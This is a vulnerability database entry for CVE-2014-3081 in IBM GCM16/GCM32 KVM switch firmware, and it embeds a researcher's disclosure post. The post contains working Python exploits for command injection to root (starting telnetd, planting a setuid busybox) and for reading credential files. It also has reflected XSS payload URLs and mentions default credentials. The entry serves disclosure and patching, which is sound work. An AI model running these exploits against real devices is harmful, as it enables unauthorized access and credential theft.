Details of VAR-201408-0280

ID

VAR-201408-0280

CVE

CVE-2014-3081

TITLE

IBM GCM16 and GCM32 Global Console Manager Switch firmware prodtest.php Vulnerable to reading arbitrary files

Trust: 0.8

sources: JVNDB: JVNDB-2014-003832

DESCRIPTION

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. An attacker can exploit this issue to read an arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. *Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Files can be anywhere on the target. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com

Trust: 2.07

sources: NVD: CVE-2014-3081 // JVNDB: JVNDB-2014-003832 // BID: 68779 // VULHUB: VHN-71020 // PACKETSTORM: 127543

AFFECTED PRODUCTS

vendor:	ibm	model:	global console manager 32	scope:	lte	version:	1.20.0.22575	Trust: 1.0
vendor:	ibm	model:	global console manager 16	scope:	lte	version:	1.20.0.22575	Trust: 1.0
vendor:	ibm	model:	1754 gcm16 global console manager	scope:	lt	version:	1.20.20.23447	Trust: 0.8
vendor:	ibm	model:	1754 gcm32 global console manager	scope:	lt	version:	1.20.20.23447	Trust: 0.8
vendor:	ibm	model:	global console manager 16	scope:	eq	version:	1.20.0.22575	Trust: 0.6
vendor:	ibm	model:	global console manager 32	scope:	eq	version:	1.20.0.22575	Trust: 0.6

sources: JVNDB: JVNDB-2014-003832 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2014-3081
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2014-3081
value:	MEDIUM
Trust: 0.8
CNNVD:	CNNVD-201407-676
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-71020
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2014-3081
severity:	MEDIUM
baseScore:	6.3
vectorString:	AV:N/AC:M/AU:S/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	SINGLE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	6.8
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
VULHUB:	VHN-71020
severity:	MEDIUM
baseScore:	6.3
vectorString:	AV:N/AC:M/AU:S/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	SINGLE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	6.8
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: VULHUB: VHN-71020 // JVNDB: JVNDB-2014-003832 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

PROBLEMTYPE DATA

problemtype:

CWE-200

Trust: 1.9

sources: VULHUB: VHN-71020 // JVNDB: JVNDB-2014-003832 // NVD: CVE-2014-3081

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201407-676

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201407-676

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-003832

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-71020

PATCH

title:

MIGR-5095983

url:

http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983

Trust: 0.8

sources: JVNDB: JVNDB-2014-003832

EXTERNAL IDS

db:	NVD	id:	CVE-2014-3081	Trust: 2.9
db:	EXPLOIT-DB	id:	34132	Trust: 1.7
db:	PACKETSTORM	id:	127543	Trust: 1.2
db:	BID	id:	68779	Trust: 1.0
db:	JVNDB	id:	JVNDB-2014-003832	Trust: 0.8
db:	CNNVD	id:	CNNVD-201407-676	Trust: 0.7
db:	SECUNIA	id:	60260	Trust: 0.6
db:	XF	id:	93930	Trust: 0.6
db:	VULHUB	id:	VHN-71020	Trust: 0.1

sources: VULHUB: VHN-71020 // BID: 68779 // JVNDB: JVNDB-2014-003832 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

REFERENCES

url:	http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983	Trust: 1.7
url:	http://www.exploit-db.com/exploits/34132/	Trust: 1.7
url:	http://seclists.org/fulldisclosure/2014/jul/113	Trust: 1.1
url:	http://packetstormsecurity.com/files/127543/ibm-1754-gcm-kvm-code-execution-file-read-xss.html	Trust: 1.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/93930	Trust: 1.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3081	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3081	Trust: 0.8
url:	http://xforce.iss.net/xforce/xfdb/93930	Trust: 0.6
url:	http://secunia.com/advisories/60260	Trust: 0.6
url:	http://www.securityfocus.com/bid/68779	Trust: 0.6
url:	http://kvm/kvm.cgi?%3cscript%3ealert%28%22aaa%22%29%3c/script%3e	Trust: 0.1
url:	https://"	Trust: 0.1
url:	http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html	Trust: 0.1
url:	https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3cscript%3ealert%28%22aaa%22%29%3c/script%3e	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-2085	Trust: 0.1
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-3080	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-3081	Trust: 0.1

sources: VULHUB: VHN-71020 // JVNDB: JVNDB-2014-003832 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

CREDITS

Alejandro Alvarez Bravo

Trust: 1.0

sources: BID: 68779 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-676

SOURCES

db:	VULHUB	id:	VHN-71020
db:	BID	id:	68779
db:	JVNDB	id:	JVNDB-2014-003832
db:	PACKETSTORM	id:	127543
db:	CNNVD	id:	CNNVD-201407-676
db:	NVD	id:	CVE-2014-3081

LAST UPDATE DATE

2025-04-13T23:05:08.333000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-71020	date:	2017-08-29T00:00:00
db:	BID	id:	68779	date:	2014-07-22T06:39:00
db:	JVNDB	id:	JVNDB-2014-003832	date:	2014-08-26T00:00:00
db:	CNNVD	id:	CNNVD-201407-676	date:	2014-08-18T00:00:00
db:	NVD	id:	CVE-2014-3081	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-71020	date:	2014-08-17T00:00:00
db:	BID	id:	68779	date:	2014-07-14T00:00:00
db:	JVNDB	id:	JVNDB-2014-003832	date:	2014-08-19T00:00:00
db:	PACKETSTORM	id:	127543	date:	2014-07-21T19:57:35
db:	CNNVD	id:	CNNVD-201407-676	date:	2014-07-29T00:00:00
db:	NVD	id:	CVE-2014-3081	date:	2014-08-17T23:55:06.887